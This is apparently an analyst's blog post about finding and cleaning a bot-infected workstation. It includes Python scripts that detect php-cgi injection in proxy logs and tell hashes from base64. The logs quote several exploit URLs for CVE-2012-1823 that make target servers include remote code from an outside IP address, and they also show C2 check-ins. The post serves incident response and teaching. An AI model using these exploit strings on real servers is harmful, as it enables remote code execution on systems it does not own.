What do you do all day?

That’s often the question I get asked by friends and family, and to be honest it’s hard to explain to non-techies, so I figured I’d pick out a recent example of a typical malware find and cleanup at work and blog about it.
It all started in the morning when I opened the daily report I email to myself from the proxy server, which flags URL requests made during the previous 24 hours in categories I consider malicious. Once past the usual false positives, one hit stood out: music.gr (.gr is the TLD for Greece). The report gives only the hostname, not the full HTTP request, so I looked up the same hit in the proxy’s reporting server to get the time, date and username of the HTTP request. Then I moved to the SIEM (log manager) to pull correlated logs from the firewalls, netflow, and the parsed raw proxy logs showing all the fields, with a start and end time of +/- 5 minutes around the hit.
In doing so I saw obviously bad outbound traffic from the suspect host, with what looked like URLs centred around webmail. This is not surprising, as webmail is a significant weak spot in many corporations. Anyway, here are some of the logs I was presented with, slightly sanitized.


hxxp://music.gr/index.php?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F81.17.24.83%252Finfo3.txt

hxxp://lutom.gov.uk/index.php?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F81.17.24.83%252Finfo3.txt

hxxp://csauk.com/index.php?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F81.17.24.83%252Finfo3.txt

hxxp://krasguatanany.ru/gley/index.php?r=gate&id=18fcfe64&group=01.06.2012&debug=0
The long URLs looked interesting and familiar, and then I remembered they looked similar to the logs one of the isc.sans.org handlers posted about HERE. They are attempts to exploit the PHP vulnerability CVE-2012-1823: php.ini directives are passed on the query string to override the PHP configuration (safe_mode off, allow_url_include on) so that the server includes the malicious code hosted at hxxp://81.17.24.83/info3.txt (via auto_prepend_file) when serving the site’s index page. I was able to fetch the malicious code from that link using Malzilla even days later as I write this. The code looked like this:
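The URLs above follow a fixed pattern: a query string that begins with "-" and carries double-percent-encoded php.ini directives. The following script is an added example (not the author's own tooling or the SANS handler's) that decodes such query strings from proxy log lines, flags the php-cgi argument-injection pattern behind CVE-2012-1823, and pulls out the remote include URL as an indicator. The log line format ("timestamp user url") and the timestamps and username in the sample are constructed; the first two URLs are taken from the post. It only recognises the php-cgi pattern, so the krasguatanany.ru C2 check-in in the sample is (correctly, for this check) reported as clean.

```python
"""Flag php-cgi argument-injection attempts (CVE-2012-1823) in proxy logs.

Added example, not the post's own tooling. Assumes constructed log lines of
the form "<timestamp> <user> <url>" and looks for query strings that start
with "-" and carry php.ini directives such as auto_prepend_file.
"""
import re
from urllib.parse import unquote, urlsplit

# Directives that make a remote-include attack work; any of them appearing as
# a "-d" argument in a query string is a strong exploitation indicator.
SUSPICIOUS_DIRECTIVES = {
    "auto_prepend_file", "allow_url_include", "allow_url_fopen",
    "safe_mode", "disable_functions",
}


def fully_unquote(s, rounds=3):
    """Undo repeated percent-encoding (the samples use %253d == %3d == '=')."""
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s


def parse_directives(query):
    """Return {directive: value} for every '-d<name>=<value>' in a query string."""
    decoded = fully_unquote(query)
    if not decoded.startswith("-"):
        return {}  # ordinary "a=b&c=d" query: php-cgi never sees it as argv
    directives = {}
    for arg in decoded.split("+"):  # '+' separates the injected argv entries
        m = re.fullmatch(r"-d\s*([A-Za-z_]+)=(.*)", arg)
        if m:
            directives[m.group(1)] = m.group(2)
    return directives


def analyze_url(url):
    """Classify one URL; returns the host, a verdict and the remote include, if any."""
    parts = urlsplit(url.replace("hxxp://", "http://", 1))
    directives = parse_directives(parts.query)
    hits = SUSPICIOUS_DIRECTIVES.intersection(directives)
    if not hits:
        return {"host": parts.hostname, "verdict": "clean", "remote_include": None}
    return {
        "host": parts.hostname,
        "verdict": "php-cgi-argument-injection",
        "directives": sorted(hits),
        "remote_include": directives.get("auto_prepend_file"),
    }


def scan_log(lines):
    """Return a finding for each log line whose URL looks like an exploit attempt."""
    findings = []
    for line in lines:
        ts, user, url = line.split(maxsplit=2)
        result = analyze_url(url)
        if result["verdict"] != "clean":
            findings.append({"time": ts, "user": user, **result})
    return findings


# Constructed sample lines: the first two URLs are from the post, the third is
# benign filler; timestamps and the username "jdoe" are made up.
SAMPLE_LOG = [
    "2012-06-01T08:14:02 jdoe hxxp://music.gr/index.php?-dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F81.17.24.83%252Finfo3.txt",
    "2012-06-01T08:14:05 jdoe hxxp://krasguatanany.ru/gley/index.php?r=gate&id=18fcfe64&group=01.06.2012&debug=0",
    "2012-06-01T08:14:09 jdoe http://example.com/index.php?page=home",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running it prints one finding for the music.gr request, with the auto_prepend_file value (the info3.txt URL) extracted, which is exactly the value you would feed to the proxy block list and the SIEM as an indicator. Decoding is done in rounds because the attacker double-encoded the "=" signs; a single unquote would leave "%3d" in place and the directive regex would never match.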

echo("830ad4ea3b311795d5a615b9e5fdbb9a");

This appears to be a short base64-encoded string. When decoded it was non-printable ASCII. I’m not sure what its purpose is; perhaps it was just a way to mark servers that had been exploited successfully, or it is further obfuscated with a key of some sort. I found this Snort blog post about the topic; they had the good idea to simply switch the filename to info2.txt, which held a more expected payload to inject, the c99 shell.
Anyway, this client was attempting to attack other Internet-facing servers through my company’s network. So that’s not good! Also, krasguatanany.ru looked like a funky URL, and it turned out to be C2 (command and control) check-in attempts.
At this point I called the user and asked him to disconnect from the network, opened a helpdesk case, asked desktop support to bring me the computer, and started taking a forensic image of the drive. This was more for practice and to mess around with later, as I didn’t believe this was anything more than “mass malware” or a common bot infection rather than a targeted attack. The machine was scanned with several anti-malware tools and cleaned to my satisfaction, turning up some Trojans and random obfuscated files.


2 thoughts on “What do you do all day?”

    • Hi afreak, thanks for the comment. You make a good point saying it’s an MD5 hash as opposed to a base64 string. To be honest, since they were just echoing it I assumed some kind of encoding of plain text that would only make sense to them, and then base64 was my first bet since it does format correctly. Although, looking at it again, it seems very unlikely a base64 string that long would not have letters higher than F. Guess I need more practice staring at unknown formatted text. Do you have any tricks you’d like to share on good ways to detect base64 when =, / or + are not included? I’ve used case sensitivity as a clue in the past but didn’t want to “trust” this text as it could be meant to deceive.
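The question raised in the post and in the comment above (is the echoed string base64 or an MD5 hash, and how do you tell when the "=", "/" and "+" characters are absent?) can be answered mechanically. The script below is an added example, not code from the post or the commenter; it applies the checks discussed: alphabet range (hex never goes past "f"), digest lengths (32/40/64 hex characters), the base64 length rule (a valid string is never 1 mod 4 long, so missing padding can be restored), case mix, and whether the decoded bytes are printable. The two base64 samples are constructed; the 32-character string is the one from info3.txt.

```python
"""Tell a hex digest from a base64 string before trying to decode it.

Added example, not from the post or the comment thread. The checks it applies
are heuristics: a 32-character hex string also happens to be valid base64,
which is why decoding it "works" but yields unprintable bytes.
"""
import base64
import binascii
import string

HEX_CHARS = set(string.hexdigits)
B64_CHARS = set(string.ascii_letters + string.digits + "+/=")
DIGEST_NAMES = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}


def looks_like_hex(s):
    """All hex digits and even length; 32/40/64 chars suggest a known digest."""
    return len(s) > 0 and len(s) % 2 == 0 and set(s) <= HEX_CHARS


def b64_decode_lenient(s):
    """Decode base64 even when '=' padding was stripped; None if malformed."""
    if len(s) % 4 == 1:
        return None  # no valid base64 string has length 1 mod 4
    padded = s + "=" * (-len(s) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable_ratio(data):
    """Share of decoded bytes that are printable ASCII (text payloads score near 1.0)."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data)


def classify(s):
    """Return (label, reasons) for a blob of unknown encoding."""
    reasons = []
    if looks_like_hex(s):
        reasons.append(f"only hex digits, length {len(s)}")
        if len(s) in DIGEST_NAMES:
            reasons.append(f"length matches a {DIGEST_NAMES[len(s)]} digest")
        if s == s.lower() or s == s.upper():
            reasons.append("single case throughout, as tools print hashes")
        return "hex", reasons
    if set(s) <= B64_CHARS:
        decoded = b64_decode_lenient(s)
        if decoded is not None:
            ratio = printable_ratio(decoded)
            reasons.append(
                f"base64 alphabet, decodes to {len(decoded)} bytes, {ratio:.0%} printable"
            )
            if any(c.isupper() for c in s) and any(c.islower() for c in s):
                reasons.append("mixed case is typical of base64 output")
            return ("base64-text" if ratio > 0.9 else "base64-binary"), reasons
    return "unknown", reasons


# The string echoed by info3.txt in the post, plus two constructed base64
# samples with their padding stripped ("hello world" and bytes 0x00..0x09).
SAMPLES = [
    "830ad4ea3b311795d5a615b9e5fdbb9a",
    "aGVsbG8gd29ybGQ",
    "AAECAwQFBgcICQ",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        label, why = classify(sample)
        print(f"{sample} -> {label}; " + "; ".join(why))
```

The hex check runs first on purpose: every 32-character hex string passes the base64 alphabet and length tests too, so a base64-first classifier will "decode" an MD5 hash into 24 bytes of mostly unprintable garbage, which is the trap described in the post. For strings that are not hex, restoring the padding from the length lets you decode base64 that has had its "=" stripped, and the printable ratio of the result tells you whether you are looking at text or at binary (or a wrong guess).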
